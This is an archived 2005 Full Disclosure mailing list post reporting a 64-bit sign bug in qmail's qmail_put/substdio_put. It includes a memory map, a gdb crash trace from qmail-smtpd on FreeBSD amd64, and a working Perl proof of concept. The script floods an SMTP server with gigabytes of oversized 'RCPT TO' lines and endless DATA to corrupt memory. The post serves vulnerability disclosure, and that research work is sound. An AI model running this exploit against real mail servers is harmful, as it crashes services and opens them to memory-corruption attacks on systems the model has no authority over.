Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: 64 bit qmail fun
From: Georgi Guninski <guninski () guninski com>
Date: Mon, 9 May 2005 16:17:34 +0300

On Fri, May 06, 2005 at 04:01:07PM +0300, Georgi Guninski wrote:
http://www.guninski.com/where_do_you_want_billg_to_go_today_4.html

3. sign problem in qmail_put/substdio_put

on
FreeBSD amdkotef64.localdomain 5.3-BETA6 FreeBSD 5.3-BETA6 #0: Sat Sep 25
21:49:38 UTC 2004     root () fanboy samsco home:/usr/obj/usr/src/sys/GENERIC
amd64

the static/heap layout is "better" than linux, so 
bytecopy(negative) passes and a lot of memory is corrupted:

0x400000 0x408000 8 0 0xffffff0047c857e0 r-x 1 0 0x2180 COW NNC vnode
/var/qmail/bin/qmail-smtpd
0x507000 0x508000 1 0 0xffffff00471e0380 rw- 1 0 0x2180 COW NNC vnode
/var/qmail/bin/qmail-smtpd
0x508000 0x50b000 3 0 0xffffff005b5d6c40 rw- 2 0 0x2180 NCOW NNC swap -
0x50b000 0x1778df000 338914 0 0xffffff005b5d6c40 rwx 2 0 0x2180 NCOW NNC swap
-
0x200507000 0x200529000 17 0 0xffffff005d2a6700 r-x 59 28 0x4 COW NC vnode
/libexec/ld-elf.so.1

note memory is contiguous.

Program received signal SIGBUS, Bus error.
0x000000020069afb6 in ldexp () from /lib/libc.so.5
(gdb) info stack
#0  0x000000020069afb6 in ldexp () from /lib/libc.so.5
#1  0x000000020069b07c in ldexp () from /lib/libc.so.5
#2  0x000000020069b2eb in ldexp () from /lib/libc.so.5
#3  0x000000020069bc6d in ldexp () from /lib/libc.so.5
#4  0x000000020069bd58 in malloc () from /lib/libc.so.5
#5  0x00000000004058aa in alloc (n=1040) at alloc.c:20
#6  0x000000000040592f in alloc_re (x=0x508e20, m=896, n=1039) at
alloc_re.c:11
#7  0x0000000000405580 in stralloc_readyplus (x=0x508e20, n=897)
    at stralloc_eady.c:6
#8  0x00000000004023a8 in commands (ss=0x507640, c=0x507660) at commands.c:20
#9  0x00000000004020e1 in main () at qmail-smtpd.c:419


(gdb) x/i $rip
0x20069afb6 <ldexp+1654>:       movq   $0x2,(%rax,%rsi,8)
(gdb) p/x $rax
$7 = 0x200837000
(gdb) p/x $rsi
$8 = 0x7676767676268

0x50b360:       0x76767676      0x76767676      0x54007676      0x76767676

probably after substdio is corrupted even more fun is possible.


---------------------------------------------------------------
#!/usr/bin/perl -w

# copyright georgi guninski
# cannot be used in vulnerability databases

use IO::Socket;

my $host=$ARGV[0] || "localhost";
my $port=$ARGV[1] || 25;

my $sock=IO::Socket::INET->new(Proto => 'TCP',PeerAddr => $host, 
        PeerPort=>$port) || die("socket");


my $payload="v" x (1024*1024);
my $lo2 = "v" x (1024*1024);

my $i=0;
my $t;

print $sock "HELO a\r\n";
print $sock "MAIL FROM: a\r\n";

my $leg = 842;

$payload = "v" x $leg;
$cou=0;
my $vp= "v" x (1024*1024);

my $wri = 0;

while (42)
{
print $sock "RCPT TO: ${payload}\r\n";
$t=<$sock>;
$cou++;
$wri += ($leg + 2);
if ($wri > 0x80000010) {last;}
if ($cou % (1024) == 0) {print " .. " . $wri/(1024*1024) . "\n";}
}



print $sock "DATA\r\n";
print $sock "where do you want bill gates to go today?\r\n";
print $sock ".\r\n";

while (42)
{
print $sock "${lo2}";
}

while(<$sock>)
{
        print $_;
}
---------------------------------------------------------------





-- 
where do you want bill gates to go today?






































_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault